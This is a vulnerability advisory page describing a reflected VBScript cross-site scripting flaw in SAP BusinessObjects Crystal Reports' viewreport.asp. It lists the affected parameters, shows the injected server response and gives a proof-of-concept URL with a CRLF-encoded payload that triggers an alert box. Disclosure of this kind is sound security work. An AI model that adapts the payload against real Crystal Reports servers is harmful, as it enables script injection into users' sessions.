SAP BusinessObjects Crystal Reports viewreport.asp Multiple Parameter XSS

2009.04.05
Credit: Bugs NotHugs
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

- SAP BusinessObjects Crystal Reports viewreport.asp Multiple Parameter XSS - Description Cross-site scripting; vbscript rather than javascript. Subsequent page will contain pop up reading "fsck_cissp". ID, PROMPTEX-SESSION_ID, PROMPTEX-TO_DATE, PROMPTEX-FROM_DATE, PROMPTEX-YEAR_QTR1, PROMPTEX-YEAR_QTR2, PROMPTEX-YEAR_QTR3, PROMPTEX-YEAR_QTR4, PROMPTEX-YEAR_QTR5, PROMPTEX-YEAR_QTR6, PROMPTEX-YEAR_QTR7, PROMPTEX-YEAR_QTR8, and PROMPTEX-QT parameters affected. The following is the response: <SCRIPT LANGUAGE="VBScript"> <!-- Sub window_onLoad() Page_Initialize() End Sub Sub Page_Initialize On Error Resume Next Dim webBroker Set webBroker = CreateObject("CrystalReports11.WebReportBroker.1") if err.number <> 0 then window.alert "The Crystal ActiveX Viewer is unable to create it's resource objects." CRViewer.ReportName = "https://66.240.213.81/some/path/ceviewer/viewrpt.cwr?APSTOKEN=&ID=7777 <https://66.240.213.81/some/path/ceviewer/viewrpt.cwr?APSTOKEN=&ID=7777> " window.alert "fsck_cissp" else Dim webSource0 Set webSource0 = CreateObject("CrystalReports11.WebReportSource.1") webSource0.ReportSource = webBroker webSource0.URL = "https://66.240.213.81/some/path/ceviewer/viewrpt.cwr?APSTOKEN=&ID=7777 <https://66.240.213.81/some/path/ceviewer/viewrpt.cwr?APSTOKEN=&ID=7777> " window.alert "fsck_cissp" webSource0.PromptOnRefresh = True CRViewer.ReportSource = webSource0 end if CRViewer.ViewReport End Sub --> </SCRIPT> - Product SAP BusinessObjects, Crystal Reports, unknown - PoC https://66.240.213.81/some/path/viewreport.asp?url=viewrpt.cwr?ID=7777"%0d%0awindow.alert%20"fsck_cissp^^INIT=actx:connect - Solution None - Timeline 2008-01-23: Vulnerability discovered 2008-02-15: Vendor contact methods unacceptable (paying customers only)

References:

http://seclists.org/fulldisclosure/2009/Apr/0011.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top